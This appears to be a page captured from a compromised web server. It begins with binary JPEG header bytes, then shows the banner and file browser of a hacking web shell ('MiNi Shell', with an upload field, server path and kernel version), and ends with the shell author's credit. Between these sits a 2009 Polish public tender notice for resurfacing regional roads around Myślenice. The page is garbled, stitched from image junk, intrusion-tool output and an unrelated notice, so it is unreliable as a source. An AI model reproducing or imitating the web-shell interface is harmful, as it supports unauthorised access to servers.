JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090128/10784-N-2009.html

<p class="kh_header"><b>Myślenice: Roboty w zakresie remontów nawierzchni bitumicznych dróg wojewódzkich administrowanych  przez Rejon Dróg Wojewódzkich w Myślenicach, z podziałem na 3 zadania</b><br>
<b>Numer ogłoszenia: 10784 - 2009; data zamieszczenia: 28.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Krakowie Rejon Dróg Wojewódzkich w Myślenicach , ul. Drogowców 2, 32-400 Myślenice, woj. małopolskie, tel. 012 2721788, faks 012 2741416.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty w zakresie remontów nawierzchni bitumicznych dróg wojewódzkich administrowanych  przez Rejon Dróg Wojewódzkich w Myślenicach, z podziałem na 3 zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty w zakresie remontów nawierzchni bitumicznych dróg wojewódzkich administrowanych  przez Rejon Dróg Wojewódzkich w Myślenicach, objętych:
Zadaniem nr 1 w skład którego wchodzą drogi woj. 
nr 946 Kuków - Sucha Beskidzka,
nr 957 Białka - Zawoja.
Zadaniem nr 2 w skład którego wchodzą drogi woj. 
nr 964 Wieliczka - Ispina, 
nr 965 Bochnia - Limanowa, 
nr 966 Wieliczka - Tymowa.
Zadaniem nr 3 w skład którego wchodzą drogi woj. 
nr 967 Myślenice - Łapczyca, 
nr 968 Lubień - Mszana Dolna.
nr 953 Skawina - Kalwaria Zebrzydowska,
nr 956 Sułkowice - Zembrzyce.
Zakres zamówienia: 
Zadanie nr 1. Remont nawierzchni bitumicznej emulsją i grysami bez obcięcia krawędzi nawierzchni przy użyciu remontera - gł. wyboi 2 cm - 230 m2, Remont nawierzchni bitumicznej emulsją i grysami bez obcięcia krawędzi nawierzchni przy użyciu remontera - gł. wyboi 4 cm - 1400 m2, Remont nawierzchni bitumicznej emulsją i grysami bez obcięcia krawędzi nawierzchni przy użyciu remontera - gł. wyboi 5 cm - 1200 m2, Mechaniczne wyrównanie nawierzchni bitumicznej masą mineralno asfaltowa warstwa ścieralna o pow. powyżej 5 m2 wraz ze skropieniem międzywarstwowym emulsją asfaltową - gr. 6 cm - 1000 m2, gr. 8 cm - 300 m2, Mechaniczne frezowanie nawierzchni bitumicznej gr. 4 cm z odwiezieniem frezu na odl. ok. 19 km -1300 m2.
Zadanie nr 2. Remont nawierzchni bitumicznej emulsją i grysami bez obcięcia krawędzi nawierzchni przy użyciu remontera - gł. wyboi 2 cm - 1025 m2, Remont nawierzchni bitumicznej emulsją i grysami bez obcięcia krawędzi nawierzchni przy użyciu remontera - gł. wyboi 4 cm - 2775 m2, Remont nawierzchni bitumicznej emulsją i grysami bez obcięcia krawędzi nawierzchni przy użyciu remontera - gł. wyboi 5 cm - 2060 m2, Mechaniczne wyrównanie nawierzchni bitumicznej masą mineralno asfaltowa warstwa ścieralna o pow. powyżej 5 m2 wraz ze skropieniem międzywarstwowym emulsją asfaltową - gr. 5 cm - 3000 m2, Mechaniczne frezowanie nawierzchni bitumicznej gr. 4 cm z odwiezieniem frezu na odl. ok. 25 km - 3000 m2.
Zadanie nr 3. Remont nawierzchni bitumicznej emulsją i grysami bez obcięcia krawędzi nawierzchni przy użyciu remontera - gł. wyboi 2 cm - 1430 m2, Remont nawierzchni bitumicznej emulsją i grysami bez obcięcia krawędzi nawierzchni przy użyciu remontera - gł. wyboi 4 cm - 2060 m2, Remont nawierzchni bitumicznej emulsją i grysami bez obcięcia krawędzi nawierzchni przy użyciu remontera - gł. wyboi 5 cm - 1670 m2, Mechaniczne wyrównanie nawierzchni bitumicznej masą mineralno asfaltowa warstwa ścieralna o pow. powyżej 5 m2 wraz ze skropieniem międzywarstwowym emulsją asfaltową - gr. 6 cm - 2070 m2, Mechaniczne frezowanie nawierzchni bitumicznej gr. 6 cm z odwiezieniem frezu na odl. ok. 15 km - 2070 m2.
Miejsce wykonania zamówienia: drogi wojewódzkie nr 946,957,964,965,966,967,968,953,956 województwo małopolskie.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zadanie nr 1  -  1.500,00 PLN.
Zadanie nr 2  -  3.000,00 PLN.
Zadanie nr 3  -  2.500,00 PLN.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  O udzielenie zamówienia mogą ubiegać się Wykonawcy  którzy:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich  uprawnień, 
b) posiadają  niezbędną wiedzę i doświadczenie  oraz  dysponują potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią  pisemne  zobowiązanie  innych  podmiotów do udostępnienia  potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.      
1)  wykażą się doświadczeniem: w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonywali co najmniej jedno zamówienie na jedno zadanie, na kategoriach dróg powiatowych, wojewódzkich lub krajowych, obejmujące roboty w zakresie remontów nawierzchni bitumicznych o wartości nie mniejszej niż dla zadania nr 1 - 150.000,00zł.,  dla zadania nr 2 - 300.000,00 zł., dla zadania nr 3 - 250.000,00 zł.
W przypadku składania oferty na kilka zadań należy udokumentować wykonywanie odpowiedniej ilości zamówień, przy zachowaniu warunku dotyczącego ich wartości.
2) dysponują osobami zdolnymi do wykonania zamówienia tj. 
osobą przewidzianą na kierownika robót, posiadającą niezbędną wiedzę i doświadczenie zawodowe w prowadzeniu remontów z okresu ostatnich 3 lat lub przedstawią  pisemne  zobowiązanie  innych  podmiotów do udostępnienia  osób zdolnych do wykonania zamówienia.
Wskazany kierownik robót w ofercie na dane zadanie może kierować robotami tylko w ramach tego jednego zadania. W przypadku składania oferty na kilka zadań Wykonawca musi dysponować odpowiednią ilością osób uprawnionych do pełnienia tej funkcji lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia  osób zdolnych do wykonania zamówienia.
3) dysponują sprzętem określonym w SST do wykonania zamówienia, tj. 
- remonter  - min 2 na jedno zadanie
- skrapiarka - min 1 na jedno zadanie
- szczotka mechaniczna - min 1 na jedno zadanie
- piła do ciecia nawierzchni - min 1 na jedno zadanie
- sprężarka - min 1 na jedno zadanie
- frezarka do nawierzchni bitumicznych - min 1 na jedno zadanie
- układarka do mas bitumicznych - min 1 na jedno zadanie
- walec drogowy ogumiony - min 1 na jedno zadanie
- walec drogowy stalowy - min 1 na jedno zadanie
lub przedstawią  pisemne  zobowiązanie  innych  podmiotów do udostępnienia  sprzętu do wykonania zamówienia.
W przypadku składania oferty na kilka zadań należy wykazać odpowiednio większą ilość sprzęt.
c) znajdują się w sytuacji ekonomicznej i  finansowej zapewniającej wykonanie zamówienia.
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, zgodnie z art. 24 Ustawy - Prawo zamówień publicznych.
2. Zamawiający dokona oceny spełnienia warunków wg formuły spełnia - nie spełnia w oparciu o wymagane w cz. III SIWZ dokumenty. Niespełnienie przez wykonawcę chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy           z postępowania .
Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.  
3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika  do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wykonawcy wspólnie ubiegający się o zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy.
4. Wymagania postawione przez Zamawiającego Wykonawcy, musi spełniać każdy z Wykonawców ubiegających się wspólnie  o udzielenie zamówienia, przy czym warunki w zakresie: sytuacji ekonomiczno-finansowej, doświadczenia, potencjału technicznego i osób mogą spełniać wspólnie.
5.Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Wykonawcy przed zawarciem umowy w sprawie zamówienia publicznego, przedstawią umowę  regulującą współpracę wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy składając ofertę na formularzu wg wzoru - zał. nr 2.1, 2.2, 2.3 SIWZ wraz z kosztorysem ofertowym wg wzoru - zał.  nr 3.1, 3.2, 3.3 SIWZ  zobowiązani są złożyć następujące dokumenty:
1. Oświadczenie o spełnieniu warunków udziału w postępowaniu - wg wzoru zał. nr 4 SIWZ. 
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż sześć miesięcy przed upływem terminu składania ofert. 
3. Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, potwierdzający spełnianie warunku o którym mowa w pkt. II.1.b.1 SIWZ  z podaniem ich wartości oraz daty i miejsca wykonania wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - wg wzoru zał. nr 5 SIWZ. 
4. Wykaz  osób  którymi  dysponuje  lub  będzie  dysponował   Wykonawca  i  które  będą  uczestniczyć  w  wykonaniu zamówienia (kierownik robót), wraz z informacjami na temat ich kwalifikacji  zawodowych, doświadczenia                      i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, potwierdzający spełnianie warunku o którym mowa w pkt. II.1.b.2 SIWZ - wg wzoru zał. nr 6  SIWZ.
5.  Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych  do wykonania  zamówienia, jeżeli w wykazie, o którym mowa w pkt III/4 SIWZ  Wykonawca  wskazał osoby, którymi będzie dysponował.
6. Wykaz sprzętu, którym dysponuje lub będzie dysponował Wykonawca do wykonania zamówienia, potwierdzający spełnianie warunku o którym mowa w pkt. II.1.b.3 SIWZ -  wg wzoru zał. nr 7 SIWZ.
7. Pisemne zobowiązanie innych podmiotów do udostępnienia sprzętu do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt III/7 SIWZ Wykonawca wykazał sprzęt, którym będzie dysponował.
8. Dowód wpłaty wadium.
Ponadto Wykonawcy wspólnie ubiegający się o udzielenie zamówienia złożą Pełnomocnictwo dla pełnomocnika, do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
W przypadku składania ofert na kilka zadań, formularze ofert (zał. nr 2.1, 2.2, 2.3 SIWZ), oraz kosztorysy ofertowe (zał. nr 3.1,3.2, 3.3 SIWZ) należy złożyć dla każdego zadania oddzielnie, pozostałe dokumenty mogą być złożone w jednym egzemplarzu. Wszystkie oferty można złożyć w jednej kopercie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdw.krakow.pl..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzkich w Myślenicach, ul. Drogowców 2 pok. nr 5 po wcześniejszym telefon. uzgodnieniu tel. 012-272-17-88 lub za zaliczeniem pocztowym. Materiały płatne 7,40 PLN + opłata pocztowa..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2009 godzina 09:30, miejsce: Zarząd Dróg Wojewódzkich w Krakowie - Rejon Dróg Wojewódzkich w Myślenicach, 32-400 Myślenice, ul. Drogowców 2 pok. nr 6 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com